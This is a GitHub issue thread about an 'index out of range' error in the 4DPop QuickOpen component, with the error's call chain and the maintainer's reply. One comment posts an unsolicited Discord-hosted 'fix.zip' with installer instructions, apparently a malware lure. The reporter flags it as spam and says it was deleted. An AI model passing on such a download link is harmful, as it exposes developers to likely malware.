### ISSUE TITLE
Error if a non-existing method/class ... is entered

### ISSUE THREAD

**Issue by elutz** [vdelachaux/4DPop-QuickOpen#1]
When I enter the name of a non-existent item in the QuickOpen component input field, I get an error message:
``` 
Error when executing the method "listbox.select" in line 17 - The index of the collection is out of range.

Error code: -10713 (4DRT)
The index of the collection is out of range.
component: '4DRT'
task -16, name: '$QUICK_OPEN'

Call chain:
[
	{
		"type": "classFunction",
		"name": "listbox.select",
		"line": 17,
		"database": "4DPop QuickOpen"
	},
	{
		"type": "classFunction",
		"name": "_quickOpen.search",
		"line": 69,
		"database": "4DPop QuickOpen"
	},
	{
		"type": "formMethod",
		"name": "QUICK_OPEN",
		"line": 47,
		"database": "4DPop QuickOpen"
	},
	{
		"type": "projectMethod",
		"name": "QUICK_OPEN",
		"line": 27,
		"database": "4DPop QuickOpen"
	}
]
```

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by elutz** [comment]
~~The previous comment is at least spam and may contain a potentially malicious link. Unfortunately, I can't delete or report it.~~
I reported it. It's now deleted.

**Comment by vdelachaux** [comment]
Hello Lutz
Thanks for the feedback. I will have a look
Vincent

PS. The previous comment is no more available. It must have been detected automatically
